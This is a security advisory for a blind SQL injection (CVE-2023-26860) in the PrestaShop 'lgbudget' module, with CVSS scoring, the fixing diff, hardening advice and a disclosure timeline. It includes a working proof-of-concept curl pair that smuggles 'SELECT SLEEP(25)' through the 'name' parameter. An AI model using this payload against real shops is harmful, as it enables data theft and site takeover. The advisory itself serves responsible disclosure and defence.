In the module “Save your carts and buy later” (lgbudget) for PrestaShop, an authenticated user can perform a blind SQL injection up to 1.0.3. Release 1.0.4 fixed this security issue.


  • CVE ID: CVE-2023-26860
  • Published at: 2023-04-04
  • Advisory source:
  • Platform: PrestaShop
  • Product: lgbudget
  • Impacted release: < 1.0.4
  • Product author: Línea Gráfica
  • Weakness: CWE-89
  • Severity: critical (9.8)


Up to 1.0.3, a sensitive SQL call in class LgBudgetBudgetModuleFrontController::displayAjaxGenerateBudget() can be exploited with a trivial http call to forge a blind SQL injection through the POST or GET submitted “name” variable.

CVSS base metrics

  • Attack vector: network
  • Attack complexity: low
  • Privilege required: none
  • User interaction: none
  • Scope: unchanged
  • Confidentiality: high
  • Integrity: high
  • Availability: high

Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Possible malicious usage

  • Technical and personal data leaks
  • Obtain admin access
  • Remove all data of the linked PrestaShop
  • Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

Proof of concept

curl -v --cookie-jar cookie.txt -X POST -d 'token=<predictable_token>&id_product=123&qty=1&add=1&action=update' 'https://domain.tld/cart'
&& curl -v --cookie cookie.txt 'https://domain.tld/module/lgbudget/budget?ajax=1&action=generateBudget&name=test%22,%20%222022-01-01%22%20%29%3BSELECT%20SLEEP%2825%29%3B--'


To fix this issue, in file controllers/front/budget.php line 42, you need to escape $name in LgBudgetBudgetModuleFrontController::displayAjaxGenerateBudget().

--- v1.0.3/lgbudget/controllers/front/budget.php
+++ v1.0.4/lgbudget/controllers/front/budget.php
@@ -39,7 +49,7 @@ class LgBudgetBudgetModuleFrontControlle
                     "' . Context::getContext()->cookie->checksum .'",
                     ' . (int)$id_shop . ', 
                     ' . (int)$id_customer . ', 
-                    "' . $name . '", 
+                    "' . pSQL($name) . '", 
                     "' . $date_add . '"

Other recommendations

  • It’s recommended to upgrade the module beyond 1.0.3. Release 1.0.4 fixed this security issue.
  • Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality WILL NOT protect your SHOP against injection SQL which uses the UNION clause to steal data.
  • Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
  • Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.


Date Action
2023-02-10 Vulnerability discovered by 202 ecommerce during a security audit
2023-02-10 Contact PrestaShop addons
2023-02-12 Request a CVE ID
2023-03-02 Fix published on addons PrestaShop marketplace
2023-03-17 Propose a delay to PrestaShop addons before disclosure
2023-03-27 PrestaShop addons confirm the CVE can be published
2023-04-04 Publication of the security advisory